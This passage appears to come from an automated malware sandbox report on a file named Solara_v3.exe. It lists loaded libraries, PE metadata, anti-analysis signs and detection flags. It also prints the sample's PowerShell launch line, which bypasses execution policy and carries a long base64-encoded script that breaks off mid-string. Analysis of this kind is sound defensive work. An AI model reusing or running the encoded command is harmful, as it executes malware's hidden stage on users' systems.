    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Solara_v3.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: Solara_v3.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: Solara_v3.exeStatic file information: File size 33921780 > 1048576
    Source: Solara_v3.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1543e00
    Source: Solara_v3.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x9f8c00
    Source: Solara_v3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: Solara_v3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: Solara_v3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: Solara_v3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Solara_v3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: Solara_v3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: Solara_v3.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Solara_v3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: n.pdbm!P source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb}!` source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\deno\deno\target\release\deps\deno.pdb source: Solara_v3.exe
    Source: Binary string: m.Core.pdb source: powershell.exe, 00000002.00000002.1735704425.00000141FBE48000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1735869418.00000141FBE83000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb}-H source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdb source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.pdb source: powershell.exe, 00000002.00000002.1714210124.00000141E544D000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.pdbhP source: powershell.exe, 00000002.00000002.1714210124.00000141E544D000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 4.0.0.0__b77a5c561934e089\System.Core.pdbF~$ source: powershell.exe, 00000002.00000002.1736252359.00000141FC0BE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.1736252359.00000141FC092000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\System.Core.pdb source: powershell.exe, 00000002.00000002.1735704425.00000141FBE48000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000002.00000002.1735869418.00000141FBE99000.00000004.00000020.00020000.00000000.sdmp
    Source: Solara_v3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: Solara_v3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: Solara_v3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: Solara_v3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: Solara_v3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline"Jump to behavior
    Source: Solara_v3.exeStatic PE information: section name: _RDATA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7E36BD push eax; ret 2_2_00007FFD9B7E36F1
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5228Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4666Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep count: 5228 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep count: 4666 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep time: -10145709240540247s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: Solara_v3.exe, 00000000.00000003.1750921429.00000203FDFB6000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749034354.00000203FDFA8000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749069863.00000203FDFB5000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1748911495.00000203FDFB5000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000002.1751704223.00000203FDFB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Yara detected Powershell decode and execute
    Source: Yara matchFile source: amsi64_7492.amsi.csv, type: OTHER
    Bypasses PowerShell execution policy
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAF
    Encrypted powershell cmdline option found
